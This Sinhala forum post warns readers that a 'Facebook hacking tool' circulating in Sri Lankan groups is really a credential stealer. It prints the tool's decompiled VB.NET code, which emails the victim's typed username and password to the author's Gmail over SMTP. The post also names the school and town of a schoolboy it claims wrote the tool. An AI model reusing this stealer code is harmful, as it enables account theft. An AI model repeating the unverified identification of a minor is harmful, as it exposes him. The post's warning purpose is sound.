Hacking facebook in 3 steps !
1. මෙතනින් Hacker software එක Download කරගන්න, Install කරන්න
2. ඊලගට ඔයලගෙ Username Password දිලා FB ලොග් වෙන්න..
3. ඔයාලා හරියට ඔයාලගෙ Account එකෙන් Log උනාට පස්සෙ, ඔයාලට Hack කරන්න ඕන කෙනාගෙ Account එකේ ID එක දෙන්න, Hack button එක ඔබන්න,
අම්මට සිරි, Register කරන්න Code එකක් ඉල්ලනවා,
Site එකකට Redirect වෙනව, Shit! Register කරන්න Pay කරන්න ඕනලු, අයියො.. ඒ වැඩේ හරි යන්න නැ. . අත ඇරලා දානවා. ...
----------------------------------------------------------------------------------------------------
මේක එක කතාවක් විතරයි, ඔයාලා දන්නවද ? මේ ගිය මාසෙ ලන්කාවෙ ගැම FB group එකකම වගේ දීපු Hacking Tool එකක්, එක පොරක් මේක ඌට පුලුවන් හැම තැනකම Post කලා, ඒකට අහුඋන පිරිස 250 කට වැඩී, elakiri ඉන්න අයත් හිටියා
ඇත්තටම මොකක්ද මේ සීන් එක, ඇත්තටම එහෙම හැක් කරන්න පුලුවන්ද ? පිලිතුර ඔව් !
එත් වෙන කවුරුත් නෙමෙයි, මෙවගෙන් හැක් වෙන්නෙ ඔයාලම, වෙන කවුරුවත් නෙමෙයි. . සමහරු අහයි උබ කොහොමද එහෙම කියන්නෙ කියලා,
ඒ tool එක Reverse engineer කරලා බැලුවා නම්, ඔයාලට බලා ගන්න පුලුවන් ඒකේ ඇතුලෙ තියෙන්නෙ මොනාද කියලා, මේ Tool එක compile කරල තිබුනෙ vb.net වල,
Debuggers, Decompilers, Hex editers කොච්චර තිබුනත් මේක .net හින්දා IL වලට Decompile කරගත්තම මේකෙ තිබුනෙ මෙහෙම code එකක්,
Dim message As New MailMessage
Try
message.From = New MailAddress("<removed>[email protected]")
message.To.Add("<removed>[email protected]")
message.Subject = Me.TextBox1.Text <,,,,,,,,,,,,,,,,,,,,,,,,,// Your username
message.Body = Me.TextBox2.Text <,,,,,,,,,,,,,,,,,,,,,,,,,,,,// your password
New SmtpClient("smtp.gmail.com") With { _
.Port = &H24B, _
.EnableSsl = True, _
.Credentials = New NetworkCredential("<removed>[email protected]", "<removed>c19960122") _
}.Send(message)
Me.TextBox2.Text = Me.TextBox2.Text
Catch exception1 As Exception
තෙරුනාද ? මේකෙන් වෙන එකමදේ, ඔයාලා Type කරන ඔයාලගෙ Username, Passwords Hacker ට send වෙනව smtp mail එකකින්, මේ gmail Username එක දැක්කම ඔයාලට තෙරෙනවා ඇති මේක ලංකාවෙ එකක්ගෙ වැඩක් කියලා, ඉතින් ඔය Mail එකයි අනිත් විස්තර ටිකක් එක්ක, Social engineering පාරක් දාලා හොයලා බැලුවම,, මු මෙ ඉස්කෝලෙ යන පොඩි එකෙක්, ,
Ariyawansha Maha Vidyalaya
ariyawansa mawatha,Beruwala.
එත් යකො, මු මේ ටිකට 100ක්ගෙ විතර FB accounts Hack කරල, වැඩිපුරම කොල්ලො, Girlsලත් ඉන්නවා 10 ක් විතර, දවසකට 20 දෙනෙක් විතර මුගෙ ගැටේට අහුවෙනවා, සමහර Girlsලා, ඒ FB help Group එකෙම දාලා, කවුරුහරි මගෙ Account එක Hack කරලා කවුරු හරි උදව් කරන්න කියලා, එ අයම වෙන අයගෙ Accounts Hack කරන්න ගිහින් තමයි ඔක උනෙ. .
FB group වල විතරක් නෙමෙයි, මු Ikman.lk එකේ පාවා මේක දාලා තියෙනවා.
මේක ඔයාලාට බොරු Credentials දිලා යන්නත් බැ, මූ regex නම් දන්න පොරක් නෙමෙයි වගේ, ඒත්, පුලුවන් විදියට ඒකත් කරලා,
ElseIf ((Me.TextBox1.Text = String.Empty) Or (Me.TextBox2.Text = String.Empty)) Then
Interaction.MsgBox("402 : Please Complete Temperary Registration For Facebook", MsgBoxStyle.Critical, "Registration Error")
ElseIf (Not Me.TextBox1.Text.Contains("@") Or Not Me.TextBox1.Text.Contains(".com")) Then
Interaction.MsgBox("Please Enter Vaild Emaild Address Here", MsgBoxStyle.Exclamation, "Error")
ElseIf (Me.TextBox1.Text.Length <= 12) Then
Interaction.MsgBox("Invaild Email Address,Try Again", MsgBoxStyle.Exclamation, "Error")
ElseIf (Me.TextBox2.Text.Length <= 3) Then
Interaction.MsgBox("Can't be LogIn , Please Enter Correct Password", MsgBoxStyle.ApplicationModal, Nothing)
Else
දැන් තේරුනාද මගේ මිතුරනේ . .. .. මේ එක Example එකක් විතරයි,
මෙ තව ලංකාවෙම තව එකක් > මෙකෙ තියෙන්නෙ net එකෙන් Trojen එකක් download කරල Execute කරන්න,
මේ තියෙන්න් SLT SPEED HACK කියලා තිබුන එකක්, මේක තමයි භයානකම එක, මේක Cookie Stealer එකක්, එ කියන්නෙ, ඔයාලා ඔයාලගෙ Mechine එකෙන් ලොග් වෙලා ඉන්න හැම Site එකකම Cookies මෙකෙන් Steal කරලා, Hackerට Send කරනවා, ඔයාලගෙ Bank, Paypal, FB, Mail, Credit card Details හැම දෙයක්ම, ,,
මගෙ 1000 Post එක EK එකට හොඩක් කාලෙකින් වැටුන නැති Subject එකක් ගැන දාන්න හිතුනා, ගොඩක් අයගෙන් oriya expose කරපු දවසෙ ඉදන් හැකිං ගැන කියලා දෙන්න කියලා ඉල්ලීම් තිබුන නිසා නිකමට වගේ දාන්න හිතුනෙ, ලැබෙන ප්‍රතිචාර අනුව ඉස්සරහට මම දන්න දේවල් මේ විදියට ඔයාලත් එක්ක බෙදා ගන්නම්,
Malware, Phising, XSS, Sniffing, MITM, Spoofing, Social Engneering, Pharming, DoSs, SQL injection,Back Dooring, Web Shells, Trojan horses, Rats, Keyloggers, Cookie Stealers, DNS Poisoning, Brute Forcing, Guessing, Fake Messenger, Whaling (මම කැමතිම එක,,ලොල්)
වගේ හැම දෙයක් ගැනම සහ, ඒවායින් බේරිලා ඉන්න හැටි මට පුලුවන් විදියට මම කියල දෙන්නම් !
ඒත් මම හැකර් කෙනෙක් නෙමෙයි, මේ මගේ සාමාන්‍ය දැනුම ඒ නිසා මට වඩා දන්න අය මේකෙ ඇති,
අද පාඩම : facebook, E-mail හෝ වෙනත් දේ හැක් කිරිමට උත්සාහ කර තමන්ම අමාරුවේ වැටීමෙන් වලකින්න,
විශේස ස්තුතිය, (කිසිදා නොදුටු අන්තර්ජාලයේ හමුවූ මිතුරන්) Zer0_thunder, Zonta, Tx , Hexer, ByteStorm, nullp0inter






